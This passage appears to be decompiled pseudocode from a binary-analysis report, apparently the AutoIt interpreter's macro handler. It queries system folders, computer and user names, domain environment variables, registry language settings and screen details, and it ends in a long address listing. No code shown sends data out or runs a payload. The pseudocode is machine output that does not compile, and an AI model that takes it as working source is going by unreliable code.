                                  								_t45 =  &_v756; // 0x48bec0
                                  								__eax = E00441E23(_t45, _t45);
                                  								__edi = __eax;
                                  								__esi = __ebx;
                                  								__eax = E0040E6A0(__ecx, __eax, __ebx);
                                  								_t46 =  &_v772; // 0x48beb0
                                  								__ecx = _t46;
                                  								__eax = E00402250(_t46);
                                  								_t47 =  &_a12; // 0x48c1c0
                                  								__ecx = _t47;
                                  								E00402250(_t47) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  							case 5:
                                  								_t48 =  &_v732; // 0x48bee0
                                  								__eax = _t48;
                                  								_t49 =  &_v708; // 0x48bef8
                                  								__ecx = _t49;
                                  								__eax = E00441E23(__edx, _t49);
                                  								__edi = __eax;
                                  								__esi = __ebx;
                                  								__eax = E0040E6A0(__ecx, __eax, __ebx);
                                  								_t50 =  &_v732; // 0x48bee0
                                  								__ecx = _t50;
                                  								__eax = E00402250(_t50);
                                  								_t51 =  &_a12; // 0x48c1c8
                                  								__ecx = _t51;
                                  								E00402250(_t51) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  							case 6:
                                  								_t52 =  &_v660; // 0x48bf30
                                  								__edx = _t52;
                                  								_t53 =  &_v716; // 0x48bef8
                                  								_t53 = E00441E23(_t52, _t53);
                                  								__edi = __eax;
                                  								__esi = __ebx;
                                  								__eax = E0040E6A0(__ecx, __eax, __ebx);
                                  								_t54 =  &_v660; // 0x48bf30
                                  								__ecx = _t54;
                                  								__eax = E00402250(_t54);
                                  								_t55 =  &_a12; // 0x48c1d0
                                  								__ecx = _t55;
                                  								E00402250(_t55) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  							case 7:
                                  								_t56 =  &_v676; // 0x485e8c
                                  								__ecx = _t56;
                                  								_t57 =  &_v780; // 0x485e24
                                  								__eax = E00441E23(_t57, _t57);
                                  								__edi = __eax;
                                  								__esi = __ebx;
                                  								__eax = E0040E6A0(__ecx, __eax, __ebx);
                                  								_t58 =  &_v676; // 0x485e8c
                                  								__ecx = _t58;
                                  								__eax = E00402250(_t58);
                                  								_t59 =  &_a12; // 0x48613c
                                  								__ecx = _t59;
                                  								E00402250(_t59) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  							case 8:
                                  								_t60 =  &_v700; // 0x48bf10
                                  								__eax = _t60;
                                  								_t61 =  &_v748; // 0x48bee0
                                  								__ecx = _t61;
                                  								__eax = E00441E23(__edx, _t61);
                                  								__edi = __eax;
                                  								__esi = __ebx;
                                  								__eax = E0040E6A0(__ecx, __eax, __ebx);
                                  								_t62 =  &_v700; // 0x48bf10
                                  								__ecx = _t62;
                                  								__eax = E00402250(_t62);
                                  								_t63 =  &_a12; // 0x48c1d8
                                  								__ecx = _t63;
                                  								E00402250(_t63) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  							case 9:
                                  								_t64 =  &_v740; // 0x48bef0
                                  								__edx = _t64;
                                  								__eax = E00441E23(__edx, __edx);
                                  								_push(__eax);
                                  								_push(L"%d");
                                  								_t65 =  &_v628; // 0x48bf60
                                  								__eax = _t65;
                                  								_push(_t65);
                                  								L16:
                                  								__eax = E0041329B(__edx);
                                  								goto L17;
                                  							case 0xa:
                                  								__ecx =  &_v68;
                                  								__eax = E00441E23( &_v28,  &_v28);
                                  								__edi = __eax;
                                  								__esi = __ebx;
                                  								__eax = E0040E6A0(__ecx, __eax, __ebx);
                                  								__ecx =  &_v68;
                                  								__eax = E00402250( &_v68);
                                  								__ecx =  &_a12;
                                  								E00402250( &_a12) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  							case 0xb:
                                  								_t70 =  &_v628; // 0x48bf68
                                  								__eax = _t70;
                                  								_push(_t70);
                                  								_push(0);
                                  								_push(0);
                                  								_push(0x26);
                                  								_push(0);
                                  								__imp__SHGetFolderPathW();
                                  								goto L18;
                                  							case 0xc:
                                  								_t71 =  &_v628; // 0x48bf68
                                  								__ecx = _t71;
                                  								_push(__ecx);
                                  								_push(0);
                                  								_push(0);
                                  								_push(0x2b);
                                  								_push(0);
                                  								__imp__SHGetFolderPathW();
                                  								goto L18;
                                  							case 0xd:
                                  								_t72 =  &_v628; // 0x48bf68
                                  								__edx = _t72;
                                  								_push(_t72);
                                  								_push(0);
                                  								_push(0);
                                  								_push(5);
                                  								_push(0);
                                  								__imp__SHGetFolderPathW();
                                  								goto L18;
                                  							case 0xe:
                                  								_t73 =  &_v628; // 0x48bf68
                                  								__eax = _t73;
                                  								_push(_t73);
                                  								_push(0);
                                  								_push(0);
                                  								_push(0x23);
                                  								_push(0);
                                  								__imp__SHGetFolderPathW();
                                  								goto L18;
                                  							case 0xf:
                                  								_t74 =  &_v628; // 0x48bf68
                                  								__ecx = _t74;
                                  								_push(__ecx);
                                  								_push(0);
                                  								_push(0);
                                  								_push(0x19);
                                  								_push(0);
                                  								__imp__SHGetFolderPathW();
                                  								goto L18;
                                  							case 0x10:
                                  								_t75 =  &_v628; // 0x48bf68
                                  								__edx = _t75;
                                  								_push(_t75);
                                  								_push(0);
                                  								_push(0);
                                  								_push(0x2e);
                                  								_push(0);
                                  								__imp__SHGetFolderPathW();
                                  								goto L18;
                                  							case 0x11:
                                  								_t76 =  &_v628; // 0x48bf68
                                  								__eax = _t76;
                                  								_push(_t76);
                                  								_push(0);
                                  								_push(0);
                                  								_push(0x1f);
                                  								_push(0);
                                  								__imp__SHGetFolderPathW();
                                  								goto L18;
                                  							case 0x12:
                                  								_t77 =  &_v628; // 0x48bf68
                                  								__ecx = _t77;
                                  								_push(__ecx);
                                  								_push(0);
                                  								_push(0);
                                  								_push(0x17);
                                  								_push(0);
                                  								__imp__SHGetFolderPathW();
                                  								goto L18;
                                  							case 0x13:
                                  								_t78 =  &_v628; // 0x48bf68
                                  								__edx = _t78;
                                  								_push(_t78);
                                  								_push(0);
                                  								_push(0);
                                  								_push(0x16);
                                  								_push(0);
                                  								__imp__SHGetFolderPathW();
                                  								goto L18;
                                  							case 0x14:
                                  								__eax =  &_v628;
                                  								_push( &_v628);
                                  								_push(0);
                                  								_push(0);
                                  								_push(0x18);
                                  								_push(0);
                                  								__imp__SHGetFolderPathW();
                                  								goto L18;
                                  							case 0x15:
                                  								__ecx =  &_v628;
                                  								_push(__ecx);
                                  								_push(0);
                                  								_push(0);
                                  								_push(0x1a);
                                  								_push(0);
                                  								__imp__SHGetFolderPathW();
                                  								goto L18;
                                  							case 0x16:
                                  								__edx =  &_v628;
                                  								_push( &_v628);
                                  								_push(0);
                                  								_push(0);
                                  								_push(0x10);
                                  								_push(0);
                                  								__imp__SHGetFolderPathW();
                                  								goto L18;
                                  							case 0x17:
                                  								__eax =  &_v628;
                                  								_push( &_v628);
                                  								_push(0);
                                  								_push(0);
                                  								_push(6);
                                  								_push(0);
                                  								__imp__SHGetFolderPathW();
                                  								goto L18;
                                  							case 0x18:
                                  								__ecx =  &_v628;
                                  								_push(__ecx);
                                  								_push(0);
                                  								_push(0);
                                  								_push(2);
                                  								_push(0);
                                  								__imp__SHGetFolderPathW();
                                  								goto L18;
                                  							case 0x19:
                                  								__edx =  &_v628;
                                  								_push( &_v628);
                                  								_push(0);
                                  								_push(0);
                                  								_push(0xb);
                                  								_push(0);
                                  								__imp__SHGetFolderPathW();
                                  								goto L18;
                                  							case 0x1a:
                                  								__eax =  &_v628;
                                  								_push( &_v628);
                                  								_push(0);
                                  								_push(0);
                                  								_push(7);
                                  								_push(0);
                                  								__imp__SHGetFolderPathW();
                                  								goto L18;
                                  							case 0x1b:
                                  								__ecx =  &_a4;
                                  								__edx =  &_v628;
                                  								_a4 = 0x104;
                                  								__eax = GetComputerNameW( &_v628, __ecx);
                                  								goto L18;
                                  							case 0x1c:
                                  								__eax =  &_v628;
                                  								__eax = GetWindowsDirectoryW( &_v628, 0x104);
                                  								__eflags = __eax;
                                  								if(__eax == 0) {
                                  									goto L144;
                                  								} else {
                                  									goto L18;
                                  								}
                                  								goto L145;
                                  							case 0x1d:
                                  								__ecx =  *0x4a9604;
                                  								__eflags = __ecx[0x16];
                                  								_push(0x104);
                                  								__edx =  &_v628;
                                  								_push( &_v628);
                                  								if(__eflags == 0) {
                                  									__eax = GetSystemDirectoryW();
                                  								} else {
                                  									__eax = 0;
                                  									_v16 = 0;
                                  									_v8 = 0;
                                  									__eax =  &_v16;
                                  									E00430E0D(__eflags,  &_v16) = __eax->i();
                                  									__ecx =  &_v16;
                                  									__eax = E00430CCB(__ecx);
                                  								}
                                  								goto L18;
                                  							case 0x1e:
                                  								L141:
                                  								__esi = __ebx;
                                  								goto L142;
                                  							case 0x1f:
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = 6;
                                  								goto L143;
                                  							case 0x20:
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = 3;
                                  								goto L143;
                                  							case 0x21:
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = 9;
                                  								goto L143;
                                  							case 0x22:
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = 5;
                                  								goto L143;
                                  							case 0x23:
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = 0xa;
                                  								goto L143;
                                  							case 0x24:
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = 0x40;
                                  								goto L143;
                                  							case 0x25:
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = 0x41;
                                  								goto L143;
                                  							case 0x26:
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = 2;
                                  								goto L143;
                                  							case 0x27:
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = 7;
                                  								goto L143;
                                  							case 0x28:
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = 8;
                                  								goto L143;
                                  							case 0x29:
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = 4;
                                  								goto L143;
                                  							case 0x2a:
                                  								L128:
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = 1;
                                  								goto L143;
                                  							case 0x2b:
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = 0x42;
                                  								goto L143;
                                  							case 0x2c:
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = 0x43;
                                  								goto L143;
                                  							case 0x2d:
                                  								__eflags =  *0x4974ea - 1;
                                  								goto L60;
                                  							case 0x2e:
                                  								__eflags =  *0x4a8719 - 1;
                                  								L60:
                                  								__esi = __ebx;
                                  								if(__eflags != 0) {
                                  									L142:
                                  									__eax = E00408F40(__edi, __esi);
                                  									 *__ebx = 0;
                                  								} else {
                                  									__eax = E00408F40(__edi, __esi);
                                  									 *__ebx = 1;
                                  								}
                                  								goto L143;
                                  							case 0x2f:
                                  								__eax =  *(__esi + 0xc8);
                                  								goto L19;
                                  							case 0x30:
                                  								__eax =  *(__esi + 0xb8);
                                  								goto L19;
                                  							case 0x31:
                                  								__eax =  *(__esi + 0xd8);
                                  								goto L19;
                                  							case 0x32:
                                  								__eax =  *(__esi + 0xf4);
                                  								__eax = E004348AA( *(__esi + 0xf4));
                                  								__esi = __ebx;
                                  								__edi = __eax;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = __edi;
                                  								goto L143;
                                  							case 0x33:
                                  								__ecx =  &_v628;
                                  								__eax = GetCurrentDirectoryW(0x104, __ecx);
                                  								goto L18;
                                  							case 0x34:
                                  								__eax = L"WIN32_NT";
                                  								goto L19;
                                  							case 0x35:
                                  								__eax =  *0x4a9604;
                                  								__eflags =  *((char*)(__eax + 0x2a)) - 1;
                                  								if( *((char*)(__eax + 0x2a)) != 1) {
                                  									__eflags =  *((char*)(__eax + 0x28)) - 1;
                                  									if( *((char*)(__eax + 0x28)) != 1) {
                                  										__eflags =  *((char*)(__eax + 0x26)) - 1;
                                  										if( *((char*)(__eax + 0x26)) != 1) {
                                  											__eflags =  *((char*)(__eax + 0x24)) - 1;
                                  											if( *((char*)(__eax + 0x24)) != 1) {
                                  												__eflags =  *((char*)(__eax + 0x22)) - 1;
                                  												if( *((char*)(__eax + 0x22)) != 1) {
                                  													__eflags =  *((char*)(__eax + 0x20)) - 1;
                                  													if( *((char*)(__eax + 0x20)) != 1) {
                                  														__eflags =  *((char*)(__eax + 0x1e)) - 1;
                                  														if( *((char*)(__eax + 0x1e)) != 1) {
                                  															__eflags =  *((char*)(__eax + 0x1c)) - 1;
                                  															if( *((char*)(__eax + 0x1c)) != 1) {
                                  																goto L99;
                                  															} else {
                                  																__eax = L"WIN_2000";
                                  															}
                                  														} else {
                                  															__eflags =  *((char*)(__eax + 0x30));
                                  															__eax = L"WIN_XPe";
                                  															if(__eflags == 0) {
                                  																__eax = L"WIN_XP";
                                  															}
                                  														}
                                  													} else {
                                  														__eax = L"WIN_2003";
                                  													}
                                  												} else {
                                  													__eax = L"WIN_VISTA";
                                  												}
                                  											} else {
                                  												__eax = L"WIN_2008";
                                  											}
                                  										} else {
                                  											__eax = L"WIN_7";
                                  										}
                                  									} else {
                                  										__eax = L"WIN_2008R2";
                                  									}
                                  								} else {
                                  									__eax = L"WIN_8";
                                  								}
                                  								goto L19;
                                  							case 0x36:
                                  								__eax =  *0x4a9604;
                                  								__edi =  *0x4a9604->wHour;
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = __edi;
                                  								goto L143;
                                  							case 0x37:
                                  								__edi =  *0x4a9604;
                                  								__edi =  &( *0x4a9604->wSecond);
                                  								__esi = __ebx;
                                  								__eax = E0040E6A0(__ecx,  &( *0x4a9604->wSecond), __ebx);
                                  								__ecx =  &_a12;
                                  								E00402250( &_a12) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  							case 0x38:
                                  								__esi =  &_v628;
                                  								__edx = L"SYSTEM\\CurrentControlSet\\Control\\Nls\\Language";
                                  								__eax = E0040F250(L"SYSTEM\\CurrentControlSet\\Control\\Nls\\Language",  &_v628, 0x80000002, L"InstallLanguage", 0x104);
                                  								L17:
                                  								__esp = __esp + 0xc;
                                  								goto L18;
                                  							case 0x39:
                                  								__edx =  *0x4a9604;
                                  								__eax =  *( *0x4a9604 + 0x2e) & 0x0000ffff;
                                  								__eflags = __eax;
                                  								if(__eax == 0) {
                                  									__eax = L"X86";
                                  								} else {
                                  									__eflags = __eax - 6;
                                  									if(__eax == 6) {
                                  										__eax = L"IA64";
                                  									} else {
                                  										__eflags = __eax - 9;
                                  										if(__eax != 9) {
                                  											L99:
                                  											__eax = L"UNKNOWN";
                                  										} else {
                                  											__eax = L"X64";
                                  										}
                                  									}
                                  								}
                                  								goto L19;
                                  							case 0x3a:
                                  								__ecx = 0;
                                  								__eax = 0x80000001;
                                  								asm("cpuid");
                                  								__esi =  &_v68;
                                  								 *__esi = 0x80000001;
                                  								 *(__esi + 4) = __ebx;
                                  								 *((intOrPtr*)(__esi + 8)) = 0;
                                  								 *(__esi + 0xc) = __edx;
                                  								__eflags = _v56 & 0x20000000;
                                  								__eax = L"X64";
                                  								if((_v56 & 0x20000000) == 0) {
                                  									__eax = L"X86";
                                  								}
                                  								__ebx = _a8;
                                  								goto L19;
                                  							case 0x3b:
                                  								__edx =  &_v800;
                                  								__eax = GetKeyboardLayoutNameW( &_v800);
                                  								__eax =  &_v800;
                                  								goto L19;
                                  							case 0x3c:
                                  								 &_v1332 = E00411567( &_v1332, L"3, 3, 8, 1");
                                  								__ecx =  &_v1332;
                                  								__esi = 0;
                                  								__edi = 0;
                                  								__eax = E004111C1( &_v1332);
                                  								__eflags = __eax;
                                  								if(__eax > 0) {
                                  									do {
                                  										__eax =  *(__ebp + __edi * 2 - 0x530) & 0x0000ffff;
                                  										__eflags = __eax - 0x20;
                                  										if(__eax != 0x20) {
                                  											__eflags = __eax - 0x2c;
                                  											if(__eax != 0x2c) {
                                  												 *((short*)(__ebp + __esi * 2 - 0x530)) = __ax;
                                  											} else {
                                  												__edx = 0x2e;
                                  												 *((short*)(__ebp + __esi * 2 - 0x530)) = __dx;
                                  											}
                                  											__esi = __esi + 1;
                                  											__eflags = __esi;
                                  										}
                                  										__eax =  &_v1332;
                                  										__edi =  &(__edi->i);
                                  										__eax = E004111C1( &_v1332);
                                  										__eflags = __edi - __eax;
                                  									} while (__edi < __eax);
                                  								}
                                  								__ecx = 0;
                                  								 *((short*)(__ebp + __esi * 2 - 0x530)) = __cx;
                                  								__eax =  &_v1332;
                                  								goto L19;
                                  							case 0x3d:
                                  								__edx =  &_v628;
                                  								__eax = GetModuleFileNameW(0,  &_v628, 0x104);
                                  								goto L18;
                                  							case 0x3e:
                                  								 &_v100 = E00433493(1,  &_v100);
                                  								__eax =  &_v100;
                                  								goto L19;
                                  							case 0x3f:
                                  								__ecx =  &_v100;
                                  								__eax = E00433493(2,  &_v100);
                                  								__eax =  &_v100;
                                  								goto L19;
                                  							case 0x40:
                                  								__edx =  &_v100;
                                  								__eax = E00433493(3,  &_v100);
                                  								__eax =  &_v100;
                                  								goto L19;
                                  							case 0x41:
                                  								 &_v100 = E00433493(4,  &_v100);
                                  								__eax =  &_v100;
                                  								goto L19;
                                  							case 0x42:
                                  								E0040E710("\r", _t215, _t217);
                                  								E00402250( &_a12);
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  							case 0x43:
                                  								"\n" = E0040E710("\n", __ebx, __ecx);
                                  								__ecx =  &_a12;
                                  								E00402250( &_a12) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  							case 0x44:
                                  								L"\r\n" = E0040E710(L"\r\n", __ebx, __ecx);
                                  								__ecx =  &_a12;
                                  								E00402250( &_a12) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  							case 0x45:
                                  								__ecx =  &_v52;
                                  								GetDesktopWindow() = GetWindowRect(__eax,  &_v52);
                                  								__edi = _v52.right;
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = __edi;
                                  								goto L143;
                                  							case 0x46:
                                  								__edx =  &_v52;
                                  								GetDesktopWindow() = GetWindowRect(__eax,  &_v52);
                                  								__edi = _v52.bottom;
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = __edi;
                                  								goto L143;
                                  							case 0x47:
                                  								__edi = GetDesktopWindow();
                                  								__eax = GetDC(__edi);
                                  								_a8 = __eax;
                                  								__eax = GetDeviceCaps(__eax, 0xc);
                                  								__esi = __ebx;
                                  								_v8 = __eax;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								__ecx = _a8;
                                  								__eax = _v8;
                                  								 *((intOrPtr*)(__ebx + 8)) = 1;
                                  								 *__ebx = _v8;
                                  								__eax = ReleaseDC(__edi, _a8);
                                  								__ecx =  &_a12;
                                  								E00402250( &_a12) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  							case 0x48:
                                  								__edi = GetDesktopWindow();
                                  								__eax = GetDC(__edi);
                                  								_a8 = __eax;
                                  								__eax = GetDeviceCaps(__eax, 0x74);
                                  								__esi = __ebx;
                                  								_v8 = __eax;
                                  								E00408F40(__edi, __ebx) = _a8;
                                  								__edx = _v8;
                                  								 *((intOrPtr*)(__ebx + 8)) = 1;
                                  								 *__ebx = _v8;
                                  								__eax = ReleaseDC(__edi, _a8);
                                  								__ecx =  &_a12;
                                  								E00402250( &_a12) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  							case 0x49:
                                  								__eax =  *0x4a7f54;
                                  								__eflags = __eax - 3;
                                  								if(__eax == 3) {
                                  									goto L128;
                                  								} else {
                                  									__eflags = __eax - 4;
                                  									if(__eax != 4) {
                                  										goto L141;
                                  									} else {
                                  										goto L128;
                                  									}
                                  								}
                                  								goto L143;
                                  							case 0x4a:
                                  								__ecx =  &_v628;
                                  								__eax = GetEnvironmentVariableW(L"COMSPEC", __ecx, 0x104);
                                  								goto L18;
                                  							case 0x4b:
                                  								"\t" = E0040E710("\t", __ebx, __ecx);
                                  								__ecx =  &_a12;
                                  								E00402250( &_a12) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  							case 0x4c:
                                  								__eax =  &_a4;
                                  								__ecx =  &_v628;
                                  								_a4 = 0x104;
                                  								__eax = GetUserNameW(__ecx,  &_a4);
                                  								goto L18;
                                  							case 0x4d:
                                  								__edx =  &_v628;
                                  								__eax = GetTempPathW(0x104,  &_v628);
                                  								__esi =  &_v628;
                                  								__eax = E00410290( &_v628, __eflags);
                                  								goto L18;
                                  							case 0x4e:
                                  								__edx =  &_v628;
                                  								__eax = GetEnvironmentVariableW(L"USERPROFILE",  &_v628, 0x104);
                                  								goto L18;
                                  							case 0x4f:
                                  								 &_v628 = GetEnvironmentVariableW(L"HOMEDRIVE",  &_v628, 0x104);
                                  								goto L18;
                                  							case 0x50:
                                  								__ecx =  &_v628;
                                  								__eax = GetEnvironmentVariableW(L"HOMEPATH", __ecx, 0x104);
                                  								goto L18;
                                  							case 0x51:
                                  								__edx =  &_v628;
                                  								__eax = GetEnvironmentVariableW(L"HOMESHARE",  &_v628, 0x104);
                                  								goto L18;
                                  							case 0x52:
                                  								 &_v628 = GetEnvironmentVariableW(L"LOGONSERVER",  &_v628, 0x104);
                                  								goto L18;
                                  							case 0x53:
                                  								__ecx =  &_v628;
                                  								__eax = GetEnvironmentVariableW(L"USERDOMAIN", __ecx, 0x104);
                                  								goto L18;
                                  							case 0x54:
                                  								__edx =  &_v628;
                                  								__eax = GetEnvironmentVariableW(L"USERDNSDOMAIN",  &_v628, 0x104);
                                  								goto L18;
                                  							case 0x55:
                                  								goto L144;
                                  							case 0x56:
                                  								__edi =  *(__esi + 0x148);
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = __edi;
                                  								L143:
                                  								 *((intOrPtr*)(__ebx + 8)) = 1;
                                  								goto L144;
                                  							case 0x57:
                                  								__eax =  *(__esi + 0x14c);
                                  								goto L19;
                                  							case 0x58:
                                  								__eax = GetCurrentProcessId();
                                  								_a8 = __eax;
                                  								asm("fild dword [ebp+0xc]");
                                  								__eflags = __eax;
                                  								if(__eax < 0) {
                                  									__fp0 = __fp0 +  *0x48cd18;
                                  								}
                                  								__esi = __ebx;
                                  								_v12 = __fp0;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								__fp0 = _v12;
                                  								__ecx =  &_a12;
                                  								 *__ebx = _v12;
                                  								 *((intOrPtr*)(__ebx + 8)) = 3;
                                  								E00402250( &_a12) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  							case 0x59:
                                  								__esi =  &_v628;
                                  								__edx = L"Control Panel\\Appearance";
                                  								__eax = E0040F250(L"Control Panel\\Appearance",  &_v628, 0x80000001, L"SchemeLangID", 0x104);
                                  								__eax = _v628 & 0x0000ffff;
                                  								_a4 = _v628 & 0x0000ffff;
                                  								__eax = E00432E88(__eax, 0, __esi, 4);
                                  								L18:
                                  								_t38 =  &_v628; // 0x48bf60
                                  								__eax = _t38;
                                  								L19:
                                  								__eax = E0040E710(__eax, __ebx, __ecx);
                                  								_t39 =  &_a12; // 0x48c1e0
                                  								__ecx = _t39;
                                  								E00402250(_t39) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  						}
                                  					}
                                  				} else {
                                  					_t232 =  &_v36;
                                  					E00401B10("@",  &_v36, _t239);
                                  					_a8 = 0;
                                  					E0040BD50(_t232, _t241,  &_a12);
                                  					E0040C2C0(0, _t232,  &_v8,  &_a8);
                                  					_t207 = _v8;
                                  					if(_v8 != 0) {
                                  						E00408E80(_t215, 0, _t207);
                                  						E00402250( &_v36);
                                  						E00402250( &_a12);
                                  						__eflags = 0;
                                  						return 0;
                                  					} else {
                                  						E00402250(_t232);
                                  						E00402250( &_a12);
                                  						return 1;
                                  					}
                                  				}
                                  				L145:
                                  			}









































                                  0x004723e0
                                  0x004723e8
                                  0x004723e8
                                  0x004723f0
                                  0x00000000
                                  0x00000000
                                  0x004723f8
                                  0x004723f8
                                  0x004723ff
                                  0x00472406
                                  0x00472411
                                  0x00472413
                                  0x00472415
                                  0x0047241a
                                  0x0047241a
                                  0x00472420
                                  0x00472425
                                  0x00472425
                                  0x0047242d
                                  0x0047242d
                                  0x00472435
                                  0x00000000
                                  0x00000000
                                  0x0047243d
                                  0x0047243d
                                  0x00472444
                                  0x00472444
                                  0x0047244b
                                  0x00472456
                                  0x00472458
                                  0x0047245a
                                  0x0047245f
                                  0x0047245f
                                  0x00472465
                                  0x0047246a
                                  0x0047246a
                                  0x00472472
                                  0x00472472
                                  0x0047247a
                                  0x00000000
                                  0x00000000
                                  0x0047247d
                                  0x0047247d
                                  0x00472484
                                  0x0047248f
                                  0x00472490
                                  0x00472495
                                  0x00472495
                                  0x0047249b
                                  0x004722b9
                                  0x004722b9
                                  0x00000000
                                  0x00000000
                                  0x004724a6
                                  0x004724ae
                                  0x004724b9
                                  0x004724bb
                                  0x004724bd
                                  0x004724c2
                                  0x004724c5
                                  0x004724ca
                                  0x004724d2
                                  0x004724d2
                                  0x004724da
                                  0x00000000
                                  0x00000000
                                  0x004724dd
                                  0x004724dd
                                  0x004724e3
                                  0x004724e4
                                  0x004724e6
                                  0x004724e8
                                  0x004724ea
                                  0x004724ec
                                  0x00000000
                                  0x00000000
                                  0x004724f7
                                  0x004724f7
                                  0x004724fd
                                  0x004724fe
                                  0x00472500
                                  0x00472502
                                  0x00472504
                                  0x00472506
                                  0x00000000
                                  0x00000000
                                  0x00472511
                                  0x00472511
                                  0x00472517
                                  0x00472518
                                  0x0047251a
                                  0x0047251c
                                  0x0047251e
                                  0x00472520
                                  0x00000000
                                  0x00000000
                                  0x0047252b
                                  0x0047252b
                                  0x00472531
                                  0x00472532
                                  0x00472534
                                  0x00472536
                                  0x00472538
                                  0x0047253a
                                  0x00000000
                                  0x00000000
                                  0x00472545
                                  0x00472545
                                  0x0047254b
                                  0x0047254c
                                  0x0047254e
                                  0x00472550
                                  0x00472552
                                  0x00472554
                                  0x00000000
                                  0x00000000
                                  0x0047255f
                                  0x0047255f
                                  0x00472565
                                  0x00472566
                                  0x00472568
                                  0x0047256a
                                  0x0047256c
                                  0x0047256e
                                  0x00000000
                                  0x00000000
                                  0x00472579
                                  0x00472579
                                  0x0047257f
                                  0x00472580
                                  0x00472582
                                  0x00472584
                                  0x00472586
                                  0x00472588
                                  0x00000000
                                  0x00000000
                                  0x00472593
                                  0x00472593
                                  0x00472599
                                  0x0047259a
                                  0x0047259c
                                  0x0047259e
                                  0x004725a0
                                  0x004725a2
                                  0x00000000
                                  0x00000000
                                  0x004725ad
                                  0x004725ad
                                  0x004725b3
                                  0x004725b4
                                  0x004725b6
                                  0x004725b8
                                  0x004725ba
                                  0x004725bc
                                  0x00000000
                                  0x00000000
                                  0x004725c7
                                  0x004725cd
                                  0x004725ce
                                  0x004725d0
                                  0x004725d2
                                  0x004725d4
                                  0x004725d6
                                  0x00000000
                                  0x00000000
                                  0x004725e1
                                  0x004725e7
                                  0x004725e8
                                  0x004725ea
                                  0x004725ec
                                  0x004725ee
                                  0x004725f0
                                  0x00000000
                                  0x00000000
                                  0x004725fb
                                  0x00472601
                                  0x00472602
                                  0x00472604
                                  0x00472606
                                  0x00472608
                                  0x0047260a
                                  0x00000000
                                  0x00000000
                                  0x00472615
                                  0x0047261b
                                  0x0047261c
                                  0x0047261e
                                  0x00472620
                                  0x00472622
                                  0x00472624
                                  0x00000000
                                  0x00000000
                                  0x0047262f
                                  0x00472635
                                  0x00472636
                                  0x00472638
                                  0x0047263a
                                  0x0047263c
                                  0x0047263e
                                  0x00000000
                                  0x00000000
                                  0x00472649
                                  0x0047264f
                                  0x00472650
                                  0x00472652
                                  0x00472654
                                  0x00472656
                                  0x00472658
                                  0x00000000
                                  0x00000000
                                  0x00472663
                                  0x00472669
                                  0x0047266a
                                  0x0047266c
                                  0x0047266e
                                  0x00472670
                                  0x00472672
                                  0x00000000
                                  0x00000000
                                  0x0047267d
                                  0x00472681
                                  0x00472688
                                  0x0047268f
                                  0x00000000
                                  0x00000000
                                  0x0047269f
                                  0x004726a6
                                  0x004726ac
                                  0x004726ae
                                  0x00000000
                                  0x004726b4
                                  0x00000000
                                  0x004726b4
                                  0x00000000
                                  0x00000000
                                  0x004726b9
                                  0x004726bf
                                  0x004726c3
                                  0x004726c8
                                  0x004726ce
                                  0x004726cf
                                  0x004726f2
                                  0x004726d1
                                  0x004726d1
                                  0x004726d3
                                  0x004726d6
                                  0x004726d9
                                  0x004726e2
                                  0x004726e4
                                  0x004726e8
                                  0x004726e8
                                  0x00000000
                                  0x00000000
                                  0x00472da0
                                  0x00472da0
                                  0x00000000
                                  0x00000000
                                  0x004726fd
                                  0x004726ff
                                  0x00472704
                                  0x00000000
                                  0x00000000
                                  0x0047270f
                                  0x00472711
                                  0x00472716
                                  0x00000000
                                  0x00000000
                                  0x00472721
                                  0x00472723
                                  0x00472728
                                  0x00000000
                                  0x00000000
                                  0x00472733
                                  0x00472735
                                  0x0047273a
                                  0x00000000
                                  0x00000000
                                  0x00472745
                                  0x00472747
                                  0x0047274c
                                  0x00000000
                                  0x00000000
                                  0x004727c7
